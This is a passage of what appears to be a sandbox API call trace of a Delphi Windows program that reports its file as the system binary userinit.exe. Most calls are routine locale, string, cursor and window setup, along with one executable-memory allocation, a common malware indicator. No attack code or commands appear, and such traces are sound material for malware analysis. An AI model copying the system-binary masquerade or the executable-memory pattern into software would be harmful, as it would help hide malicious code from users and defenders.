[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Apr") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fa20, cchData=256 | out: lpLCData="April") returned 6
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fa20, cchData=256 | out: lpLCData="May") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fa20, cchData=256 | out: lpLCData="May") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Jun") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fa20, cchData=256 | out: lpLCData="June") returned 5
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Jul") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fa20, cchData=256 | out: lpLCData="July") returned 5
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Aug") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fa20, cchData=256 | out: lpLCData="August") returned 7
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Sep") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fa20, cchData=256 | out: lpLCData="September") returned 10
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Oct") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fa20, cchData=256 | out: lpLCData="October") returned 8
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Nov") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fa20, cchData=256 | out: lpLCData="November") returned 9
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Dec") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fa20, cchData=256 | out: lpLCData="December") returned 9
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Sun") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Sunday") returned 7
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Mon") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Monday") returned 7
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Tue") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Tuesday") returned 8
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Wed") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Wednesday") returned 10
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Thu") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Thursday") returned 9
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Fri") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Friday") returned 7
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Sat") returned 4
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Saturday") returned 9
[0137.334] GetThreadLocale () returned 0x409
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="$") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="0") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="0") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fb74, cchData=2 | out: lpLCData=",") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fb74, cchData=2 | out: lpLCData=".") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="2") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fb74, cchData=2 | out: lpLCData="/") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0137.334] GetThreadLocale () returned 0x409
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fa48, cchData=256 | out: lpLCData="1") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0137.334] GetThreadLocale () returned 0x409
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fa48, cchData=256 | out: lpLCData="1") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fb74, cchData=2 | out: lpLCData=":") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="AM") returned 3
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="PM") returned 3
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="0") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="0") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fa7c, cchData=256 | out: lpLCData="0") returned 2
[0137.334] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fb74, cchData=2 | out: lpLCData=",") returned 2
[0137.335] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0137.335] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0137.336] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0137.336] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0137.336] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0137.336] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0137.336] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0137.336] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0137.336] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0137.336] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0137.336] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0137.336] GetDC (hWnd=0x0) returned 0x5501085a
[0137.336] GetDeviceCaps (hdc=0x5501085a, index=90) returned 96
[0137.336] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0137.337] GetDC (hWnd=0x0) returned 0x5501085a
[0137.337] GetDeviceCaps (hdc=0x5501085a, index=104) returned 0
[0137.337] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0137.337] CreatePalette (plpal=0x18f7d8) returned 0x1a08085d
[0137.337] GetStockObject (i=7) returned 0x1b00017
[0137.337] GetStockObject (i=5) returned 0x1900015
[0137.337] GetStockObject (i=13) returned 0x18a002e
[0137.337] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0137.337] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0137.337] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0137.337] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0137.338] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0137.339] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x18f7d4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0137.339] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0137.339] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0137.339] GetVersion () returned 0x1db10106
[0137.339] GetCurrentProcessId () returned 0x8a4
[0137.339] GlobalAddAtomA (lpString="Delphi000008A4") returned 0xc128
[0137.339] GetCurrentThreadId () returned 0x89c
[0137.339] GlobalAddAtomA (lpString="ControlOfs004000000000089C") returned 0xc127
[0137.339] RegisterClipboardFormatA (lpszFormat="ControlOfs004000000000089C") returned 0xc173
[0137.339] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0137.340] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0137.340] GetSystemMetrics (nIndex=19) returned 1
[0137.346] GetSystemMetrics (nIndex=75) returned 1
[0137.346] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x12a1310, fWinIni=0x0 | out: pvParam=0x12a1310) returned 1
[0137.346] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0137.346] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0137.346] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x9022d
[0137.346] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0137.346] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0137.347] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0137.347] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x70221
[0137.347] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x7021d
[0137.347] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x70219
[0137.347] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x80217
[0137.347] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x80215
[0137.347] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x80203
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0137.348] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0137.348] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0137.348] GetDC (hWnd=0x0) returned 0x5501085a
[0137.348] GetDeviceCaps (hdc=0x5501085a, index=90) returned 96
[0137.348] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0137.348] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0137.348] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x12a155c) returned 1
[0137.348] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fb3f, fWinIni=0x0 | out: pvParam=0x18fb3f) returned 1
[0137.348] CreateFontIndirectA (lplf=0x18fb3f) returned 0x3e0a0898
[0137.348] GetObjectA (in: h=0x3e0a0898, c=60, pv=0x18f930 | out: pv=0x18f930) returned 60
[0137.349] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18f9eb, fWinIni=0x0 | out: pvParam=0x18f9eb) returned 1
[0137.349] CreateFontIndirectA (lplf=0x18fac7) returned 0x380a084e
[0137.349] GetObjectA (in: h=0x380a084e, c=60, pv=0x18f930 | out: pv=0x18f930) returned 60
[0137.349] CreateFontIndirectA (lplf=0x18fa8b) returned 0x250a0883
[0137.349] GetObjectA (in: h=0x250a0883, c=60, pv=0x18f930 | out: pv=0x18f930) returned 60
[0137.349] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0137.349] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fa9f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0137.349] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x18fa9f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0137.349] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0137.349] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fa54 | out: lpWndClass=0x18fa54) returned 0
[0137.349] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0137.349] GetSystemMetrics (nIndex=0) returned 1440
[0137.349] GetSystemMetrics (nIndex=1) returned 900
[0137.349] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x901e8
[0137.353] SetWindowLongA (hWnd=0x901e8, nIndex=-4, dwNewLong=856047) returned 4219500
[0137.353] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0137.353] SendMessageA (hWnd=0x901e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0137.353] DefWindowProcA (hWnd=0x901e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0137.365] DefWindowProcA (hWnd=0x901e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x701f5
[0137.365] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0137.366] SetClassLongA (hWnd=0x901e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0137.366] GetSystemMenu (hWnd=0x901e8, bRevert=0) returned 0x701c3
[0137.368] DeleteMenu (hMenu=0x701c3, uPosition=0xf030, uFlags=0x0) returned 1
[0137.368] DeleteMenu (hMenu=0x701c3, uPosition=0xf000, uFlags=0x0) returned 1
[0137.368] DeleteMenu (hMenu=0x701c3, uPosition=0xf010, uFlags=0x0) returned 1
[0137.369] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fa20 | out: lpList=0x18fa20) returned 1
[0137.370] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0137.370] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0137.370] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0137.371] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
